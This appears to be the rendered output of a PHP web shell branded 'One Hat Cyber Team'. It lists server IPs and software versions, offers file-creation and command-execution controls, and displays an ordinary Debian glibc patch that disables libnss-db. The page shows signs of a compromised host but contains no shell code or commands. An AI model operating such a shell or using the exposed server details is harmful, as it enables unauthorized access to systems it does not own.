⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.184
Server IP:
65.21.180.239
Server:
Linux gowhm.eplangoweb.com 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.0.30
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
proc
/
self
/
root
/
usr
/
src
/
glibc
/
debian
/
patches
/
any
/
View File Name :
local-disable-libnss-db.diff
Disable libnss-db as the format is not compatible with the libnss-db package, and is architecture dependent. --- nss/Makefile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) --- a/nss/Makefile +++ b/nss/Makefile @@ -61,7 +61,7 @@ endif # Specify rules for the nss_* modules. We have some services. -services := files db compat +services := files compat extra-libs = $(services:%=libnss_%) # These libraries will be built in the `others' pass rather than